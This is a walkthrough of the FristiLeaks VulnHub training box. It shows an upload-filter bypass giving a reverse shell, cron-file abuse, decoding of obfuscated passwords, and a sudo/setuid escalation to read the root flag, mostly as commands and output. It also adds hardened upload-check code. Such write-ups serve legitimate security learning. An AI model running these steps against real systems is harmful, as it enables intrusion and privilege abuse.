FristiLeaks

This is the second box on my list to work through. As I mentioned earlier, this list is made up of old boxes, but they can still be a good challenge when working up to the OSCP.
Recon
Starting with an nmap scan to find out which ports are open and what public-facing services are running on the system.
```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
```
Only port 80 is open, with a webserver running behind it. The webserver version is Apache 2.2.15, and the server header gives away that the OS is CentOS.
There are some entries in the robots.txt file, but before I investigate the website, I'm going to check the known vulnerabilities of this Apache version.
```
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # searchsploit apache 2.2.15
-------------------------------------------------------- ----------------------------------
 Exploit Title                                          |  Path
                                                        | (/usr/share/exploitdb/)
-------------------------------------------------------- ----------------------------------
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt
-------------------------------------------------------- ----------------------------------
Shellcodes: No Result
```
Webserver
The main page of the website lists the names of the hackers behind Fristileaks, and in the source there is a comment:
```html
<!--
Welcome to #Fristleaks, a quick hackme VM by @Ar0xA
Goal: get UID 0 (root) and read the special flag file.
Timeframe: should be doable in 4 hours.
-->
```
The 3 entries in the robots.txt file all point to the same picture, which looks like a red herring. Just to be sure I check the picture for metadata or other hidden data, but I can't find anything.
Time to run dirsearch and brute-force the website in the hope of finding more files or folders.
Nothing. Very frustrating. I tried different wordlists, but all came back with the same results: only the 3 drinks. After cracking my head over it, it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn't in any of my lists, mostly because it is a particular Dutch drink: fristi.
The result was an admin portal with some comments.
```html
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
```
```html
<!-- (a second comment holding a long base64-encoded blob, omitted here) -->
```
There are several ways to decode this base64 comment. As it is an encoded PNG file, I simply swap the existing inline image on the site for this string. The result is a picture with a string of letters:
keKkeKKeKKeKkEkkEk
A password? But what about the username? In the comment above there is a name:
eezeepz
This username combined with the password gives me access to a page with an upload possibility.
Will it let me upload anything?
```
Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded
```
So it won't let me upload a php file. Will it let me upload a file with the extension php.jpg?
```
Uploading, please wait
The file has been uploaded to /uploads
```
Yes, it will. Now to start up a listener and run the file from the browser.
```
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
```
The file can be found at /fristi/uploads/shell.php.jpg
```
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 17:17:45 up  1:05,  0 users,  load average: 0.00, 0.01, 0.20
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
```
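The upload filter only looked at the last extension, so shell.php.jpg passed, while Apache's mod_php handler mapping (AddHandler) matches any extension in the name, so the file is still executed. The following is an added example, not the box's code: it shows that weak check beside a hardened one (single allow-listed extension, sanitised base name, and a magic-bytes check of the content). The sample file contents are constructed.

```python
import re

ALLOWED_EXT = {"png", "jpg", "gif"}
# Leading bytes of the three allowed image formats.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed sample uploads: a minimal PNG header and a PHP stub.
PNG_SAMPLE = MAGIC["png"] + b"\x00" * 8
PHP_SAMPLE = b"<?php /* constructed sample */ ?>"


def weak_is_allowed(filename: str) -> bool:
    """The kind of check the box uses: only the last extension is
    consulted, so 'shell.php.jpg' is accepted."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def strict_is_allowed(filename: str, data: bytes) -> bool:
    """Hardened check: exactly one extension, allow-listed, a sane base
    name, and content whose leading bytes match the claimed type."""
    name = filename.rsplit("/", 1)[-1]           # drop any path component
    parts = name.lower().split(".")
    if len(parts) != 2:                          # 'base.ext' only
        return False
    base, ext = parts
    if ext not in ALLOWED_EXT:
        return False
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", base):
        return False
    return data.startswith(MAGIC[ext])


def safe_storage_name(filename: str, data: bytes, file_id: str) -> str:
    """Store under a server-chosen name so the client-supplied name never
    reaches the filesystem; file_id is an assumed server-side identifier."""
    if not strict_is_allowed(filename, data):
        raise ValueError("rejected upload")
    return f"{file_id}.{filename.rsplit('.', 1)[-1].lower()}"


if __name__ == "__main__":
    print("weak  shell.php.jpg:", weak_is_allowed("shell.php.jpg"))
    print("strict shell.php.jpg:", strict_is_allowed("shell.php.jpg", PHP_SAMPLE))
    print("strict photo.png:", strict_is_allowed("photo.png", PNG_SAMPLE))
```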
A good place to start is the www folder, to look for things I've missed.
```
sh-4.1$ cd /var/www
cd /var/www
sh-4.1$ ls -lah
ls -lah
total 28K
drwxr-xr-x.  6 root root 4.0K Nov 17  2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19  2015 ..
drwxr-xr-x.  2 root root 4.0K Aug 24  2015 cgi-bin
drwxr-xr-x.  3 root root 4.0K Nov 17  2015 error
drwxr-xr-x.  7 root root 4.0K Nov 25  2015 html
drwxr-xr-x.  3 root root 4.0K Nov 17  2015 icons
-rw-r--r--   1 root root   98 Nov 17  2015 notes.txt
```
There is a file called notes.txt:
```
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry
```
In the home directory of user eezeepz there is another note:
```
sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should run every
minute with my account privileges.

- Jerry
```
Ok, so I can try to use chmod to let me read more home folders. An important detail in the note is that the full path of each binary is required. So in this case I try /usr/bin/chmod.
```
sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis
echo "/home/admin/chmod -R 777 /home/" > runthis
```
After a minute I check /home and it seems to have worked.
```
sh-4.1$ ls -lah /home
ls -lah /home
total 28K
drwxr-xr-x.  5 root      root      4.0K Nov 19  2015 .
dr-xr-xr-x. 22 root      root      4.0K May 27 16:11 ..
drwxrwxrwx.  2 admin     admin     4.0K Nov 19  2015 admin
drwx---r-x.  5 eezeepz   eezeepz    12K Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod 4.0K Nov 19  2015 fristigod
```
```
sh-4.1$ ls -lah
ls -lah
total 652K
drwxrwxrwx. 2 admin     admin     4.0K Nov 19  2015 .
drwxr-xr-x. 5 root      root      4.0K Nov 19  2015 ..
-rwxrwxrwx. 1 admin     admin       18 Sep 22  2015 .bash_logout
-rwxrwxrwx. 1 admin     admin      176 Sep 22  2015 .bash_profile
-rwxrwxrwx. 1 admin     admin      124 Sep 22  2015 .bashrc
-rwxrwxrwx  1 admin     admin      45K Nov 18  2015 cat
-rwxrwxrwx  1 admin     admin      48K Nov 18  2015 chmod
-rwxrwxrwx  1 admin     admin      737 Nov 18  2015 cronjob.py
-rwxrwxrwx  1 admin     admin       21 Nov 18  2015 cryptedpass.txt
-rwxrwxrwx  1 admin     admin      258 Nov 18  2015 cryptpass.py
-rwxrwxrwx  1 admin     admin      89K Nov 18  2015 df
-rwxrwxrwx  1 admin     admin      24K Nov 18  2015 echo
-rwxrwxrwx  1 admin     admin     160K Nov 18  2015 egrep
-rwxrwxrwx  1 admin     admin     160K Nov 18  2015 grep
-rwxrwxrwx  1 admin     admin      84K Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod   25 Nov 19  2015 whoisyourgodnow.txt
```
A few python scripts and text files. Let's look at the text file owned by fristigod.
```
sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
```
Hmmm. What about the other text file?
```
sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
```
It isn't plain base64. So let's take a look at the python script.
```python
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
```
It takes a string, base64-encodes it, reverses the result and finally applies rot13.
To make the text readable again, I need to undo these steps in the opposite order: rot13 (which is its own inverse), reverse, then base64-decode. For this I can use a bash one-liner.
```
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
thisisalsopw123
```
```
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
LetThereBeFristi!
```
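The same three steps and their inverse, written in Python 3 as an added example (the box's cryptpass.py is Python 2 and only encodes). The two input strings are the ones from the text files above; the round trip makes the point that this is reversible obfuscation with no key, not encryption.

```python
import base64
import codecs


def encode_string(plaintext: str) -> str:
    """Same three steps as the box's cryptpass.py: base64, reverse, rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(obfuscated: str) -> str:
    """Undo the steps in reverse order: rot13 is its own inverse, then
    un-reverse, then base64-decode. The '=' padding is untouched by rot13,
    which is why it shows up at the front of the second string."""
    b64 = codecs.encode(obfuscated, "rot13")[::-1]
    return base64.b64decode(b64).decode()


# Values from cryptedpass.txt and whoisyourgodnow.txt on the box.
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"

if __name__ == "__main__":
    for blob in (CRYPTEDPASS, WHOISYOURGODNOW):
        print(blob, "->", decode_string(blob))
    # Round trip: anyone holding the script can reverse it, no secret needed.
    assert decode_string(encode_string("anything")) == "anything"
```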
Ok. Let’s see if this is a password.
```
sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");'
python -c 'import pty;pty.spawn("/bin/sh");'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
```
```
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin  eezeepz  fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -lah
ls -lah
total 20K
drwx------  2 fristigod fristigod 4.0K Nov 19  2015 .
drwxr-xr-x. 5 root      root      4.0K Nov 19  2015 ..
-rw-r--r--  1 fristigod fristigod   18 Sep 22  2015 .bash_logout
-rw-r--r--  1 fristigod fristigod  176 Sep 22  2015 .bash_profile
-rw-r--r--  1 fristigod fristigod  124 Sep 22  2015 .bashrc
```
Nothing. But as we could see in /etc/passwd, the home folder of this user is actually located in /var/fristigod.
```
bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x---  3 fristigod fristigod 4.0K Nov 25  2015 .
drwxr-xr-x. 19 root      root      4.0K Nov 19  2015 ..
-rw-------  1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25  2015 .secret_admin_stuff
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25  2015 .
drwxr-x---  3 fristigod fristigod 4.0K Nov 25  2015 ..
-rwsr-sr-x  1 root      root      7.4K Nov 25  2015 doCom
bash-4.1$ file doCom
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
```
An ELF binary owned by root with the SUID and SGID bits set.
```
bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)
```
Hahaha. Bummer. Let's see what sudo allows this user to do.
```
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL
    PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
```
```
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
```
So I can run the binary as the user fristi, and it takes a command to execute as its argument. First a harmless test:
```
bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp
sudo -u fristi ./doCom touch /var/fristigod/test.tmp
bash-4.1$ ls -lah /var/fristigod
ls -lah /var/fristigod
total 16K
drwxr-x---  3 fristigod fristigod 4.0K May 27 18:31 .
drwxr-xr-x. 19 root      root      4.0K Nov 19  2015 ..
-rw-------  1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25  2015 .secret_admin_stuff
-rw-r--r--  1 root      users        0 May 27 18:31 test.tmp
```
Nice. The file was created as root, so the command runs with root privileges.
```
bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
bash-4.1$ ls -lah /root
ls -lah /root
total 48K
drwxrwxrwx.  3 root root 4.0K Nov 25  2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
-rwxrwxrwx   1 root root 1.9K Nov 25  2015 .bash_history
-rwxrwxrwx.  1 root root   18 May 20  2009 .bash_logout
-rwxrwxrwx.  1 root root  176 May 20  2009 .bash_profile
-rwxrwxrwx.  1 root root  176 Sep 22  2004 .bashrc
drwxrwxrwx.  3 root root 4.0K Nov 25  2015 .c
-rwxrwxrwx.  1 root root  100 Sep 22  2004 .cshrc
-rwxrwxrwx.  1 root root 1.3K Nov 17  2015 .mysql_history
-rwxrwxrwx.  1 root root  129 Dec  3  2004 .tcshrc
-rwxrwxrwx.  1 root root  829 Nov 17  2015 .viminfo
-rwxrwxrwx.  1 root root  246 Nov 17  2015 fristileaks_secrets.txt
```
```
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1
```
And that was the challenge. Not too difficult, and really a good one to try.